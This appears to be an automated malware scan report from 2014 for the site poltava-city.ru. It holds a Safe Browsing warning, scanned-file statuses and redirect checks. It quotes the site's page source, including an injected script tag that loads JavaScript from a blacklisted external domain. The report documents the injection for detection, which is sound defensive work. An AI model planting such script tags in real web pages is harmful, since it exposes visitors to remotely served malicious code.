Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=poltava-city.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://poltava-city.ru/ | 200 OK Content-Length: 46352 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: corollo.ru ...[929 bytes skipped]... <script type="text/javascript" src="/core/js/common.js"></script> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/> <link href="/templates/variant/css/sostoim.css" rel="stylesheet" type="text/css" /> <link href="/templates/variant/css/ustalimi.css" rel="stylesheet" type="text/css" /> </head> <script type="text/javascript" src="http://corollo.ru/?type=js&key=0a2ad762c2d01d1"></script> <body> <div id="obertka"> <div id="golova"> <div style="padding: 5px"></div> <div class="module"> <div class="modulebody"><script type="text/javascript"> iadv_siteid = 264; iadv_blockid = 297; </script> <script type="text/javascript" src="http://i-adv.biz/code.js"></script></div> < ...[2964 bytes skipped]... | ||
http://poltava-city.ru/includes/jquery/jquery.js | 200 OK Content-Length: 85925 Content-Type: application/x-javascript | clean |
http://poltava-city.ru/core/js/common.js | 200 OK Content-Length: 371 Content-Type: application/x-javascript | clean |
http://corollo.ru/?type=js&key=0a2ad762c2d01d1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://corollo.ru/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://i-adv.biz/code.js | 403 Forbidden Content-Length: 564 Content-Type: text/html | clean |
http://xoliter.com/22lc/8/ff3187d/59e7.js | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://xoliter.com/85gb0b/062aa80a7ca.js | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: poltava-city.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 09 Aug 2014 20:32:18 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8dbf2e8d8f9b5a9e099d8634bbbd9a3a; path=/
X-Powered-By: PHP/5.2.6-1+lenny16
GET / HTTP/1.1
Host: poltava-city.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 09 Aug 2014 20:32:18 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8dbf2e8d8f9b5a9e099d8634bbbd9a3a; path=/
X-Powered-By: PHP/5.2.6-1+lenny16
Second query (visit from search engine):
GET / HTTP/1.1
Host: poltava-city.ru
Referer: http://www.google.com/search?q=poltava-city.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: poltava-city.ru
Referer: http://www.google.com/search?q=poltava-city.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.